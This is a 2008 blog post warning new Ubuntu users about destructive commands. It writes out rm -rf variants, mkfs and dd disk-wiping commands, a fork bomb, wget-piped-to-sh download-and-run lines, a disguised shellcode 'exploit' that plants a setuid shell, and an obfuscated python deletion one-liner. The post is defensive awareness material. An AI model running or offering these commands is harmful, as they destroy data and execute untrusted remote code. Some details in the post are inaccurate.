Sunday, November 2, 2008

Dangerous Commands You Should not run in ubuntu linux !!

A Collection of dangerous command which will damage your Ubuntu operating system! Please DO NOT execute any of them with out proper knowledge , just read and learn!

sudo rm -rf / (will delete all your files on your system) - required administrator rights!
sudo rm -rf . (will delete the current directory your in) -
required administrator rights!
sudo rm -rf * (will delete all the files in the current folder) -
required administrator rights!
rm -rf * or rm -rf *.* ( will delete all the files in the current folder) - No administrator rights needed!
rm -rf ~/ & ( will destroy your home directory) - No administrator rights needed


Commands which will erase your harddisk!

sudo mkfs (will format your hard drive) -
required administrator rights!
sudo mkfs.ext3 ( will format your hard drive) - required administrator rights!
sudo mkfs.bfs ( will format your hard drive) -
required administrator rights!
sudo mkfs.cramfs ( will format your hard drive) - No administrator rights needed!
sudo mkfs.ext2 (will format your hard drive) -
required administrator rights!
sudo mkfs.minix (will format your hard drive) -
required administrator rights!
sudo mkfs.msdos (will format your hard drive) -
required administrator rights!
sudo mkfs.reiserfs (will format your hard drive) -
required administrator rights!
sudo mkfs.vfat (will format your hard drive) -
required administrator rights!

The dd command can be very dangerous, especially when you have no idea what it does! Below are some examples, but remember that these can vary often!
sudo dd if=/dev/zero of=/dev/hda (MOST DANGEROUS COMMAND! It will zero out the whole primary IDE hard drive) ( required administrator rights)
sudo dd if=/dev/hda of=/dev/hdb (Needs administrator rights)
sudo dd if=something of=/dev/hda (Needs administrator rights)

WARNING: /dev/hda and /dev/hdb from the above example can be replaced with /dev/sda or /dev/sdb in the case of SATA and SCSI.

Block device manipulation: Causes raw data to be written to a block device. Often times this will strike violently the filesystem and cause total loss of data!
any_command > /dev/sda
dd if=something of=/dev/sda

Forkbomb : It is a malicious script that will execute a number of processes until your system freezes, this will force you to do a hard reboot which may cause damage to your system.

The below command looks really intriguing and curiosity may lead new and inexperienced users to execute it! DON'T EXECUTE THEM!

CODE :
:(){:|:&};:
CODE :
fork while fork

Tarbomb: Let's say that somebody who wants to help you, he offer a tar.gz or tar.bz2 archive and asks you to extract it into an existing directory. This archive can be crafted to explode into a billions of files, or inject other existing files into the system by guessing their filenames. You should make the habit of decompressing tar.gz or tar.bz2 archives inside a newly created empty directory!

Decompression bomb: Here's another example. Let's say somebody asks you to extract an archive which appears to be a small download. In reality it's highly compressed data and will inflate to hundreds of Gigabites, filling your hard drive until it freezes! You should not touch data from an untrusted source!

Shellscript: This one is very dangrous! Somebody gives you a link to download, to a shellscript and then they will asks you to execute it. This script can contain dangerous command he chooses, and that will damage your system . Do not execute code from people you don't trust! Here are some examples:
CODE :
wget http://my_site/my_file
sh ./some_file

Example :
wget http://ceattingal.ac.in/malicious-script
sh ./malicious-script

or
wget http://my_site/my_file -O- | sh
Example :
wget http://ihrd.org/malicious-script -O- | sh

Compiling code: Some person gives you the source code to an application and tells you to compile it. It is easy to hide dangerous codes in side large wad of source code, the attacker can easly damage your system. So Do not compile or execute the compiled code unless the source is of some well-known application, obtained from a reputable site.

A famous example I have seen on a mailing list disguised as a proof of concept sudo exploit claiming that if you run it, sudo grants you root without a shell. There was this payload:

CODE :
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "xebx3ex5bx31xc0x50x54x5ax83xecx64x68"
"xffxffxffxffx68xdfxd0xdfxd9x68x8dx99"
"xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7"
"x56x04xf7x56x08xf7x56x0cx83xc4x74x56"
"x8dx73x08x56x53x54x59xb0x0bxcdx80x31"
"xc0x40xebxf9xe8xbdxffxffxffx2fx62x69"
"x6ex2fx73x68x00x2dx63x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

To the new and inexperienced computer user, this looks like the "hex code gibberish stuff" that is so typical of a safe proof-of-concept. However, this actually runs rm -rf ~ / & which will destroy your home directory as a regular user, or all files as root.

Here's another example of code that should definitely NOT be executed by anyone!

CODE : python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'

Where "sn!.sg!+" is simply rm -rf * shifted a character up.

It is just for awareness of new and inexperienced users , You must know the above commands, don't try then with out proper knowledge. Good Luck

No comments: